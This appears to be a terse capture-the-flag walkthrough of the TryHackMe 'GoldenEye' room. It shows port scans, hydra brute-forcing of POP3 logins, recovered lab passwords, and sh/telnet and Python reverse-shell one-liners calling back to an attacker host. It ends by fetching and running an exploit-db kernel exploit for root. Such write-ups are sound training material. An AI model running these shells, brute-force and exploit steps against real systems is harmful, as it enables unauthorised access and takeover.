GoldenEye

Room Link: https://tryhackme.com/room/goldeneye

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

We find a encoded password and also a potential other user, Natalya.

I can login to /sev-home now

Username: boris
Password: InvincibleHack3r

TCP/55007 - POP3

Kali

telnet $VICTIM 55007
USER boris
PASS InvincibleHack3r

Kali

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007

Kali

hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007

Kali

telnet $VICTIM 55007
USER natalya
PASS bird
RETR 1
RETR 2

New password still doesn't work but maybe can be used elsewhere.

Kali

telnet $VICTIM 55007
USER boris
PASS secret1!
RETR 1
RETR 2
RETR 3

Added severnaya-station.com to my hosts file and then navigated to http://severnaya-station.com/gnocertdir as mentioned in the email

username: xenia
password: RCP90rulez!

Kali

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007

Kali

telnet $VICTIM 55007
USER doak
PASS goat
RETR 1

Kali

exiftool for-007.jpg 
echo 'eFdpbnRlcjE5OTV4IQ==' | base64 -d 

It was the password for admin

Username: admin
Password: xWinter1995x!

Initial Shell

Kali

nc -lvnp 4444

Browser

sh -c '(sleep 4062|telnet $KALI 4444|while : ; do sh && break; done 2>&1|telnet $KALI 4444 >/dev/null 2>&1 &)'

It kind of worked but the shell kept breaking so I switched it to a python one and did the same thing.

Kali

nc -lvnp 4444

Browser

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privlege Escalation

Just changed below line from gcc to cc as gcc is not installed on the host

Kali

wget https://www.exploit-db.com/raw/37292 -O ofs.c 
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/ofs.c 
id
cc ofs.c -o ofs
./ofs
id
whoami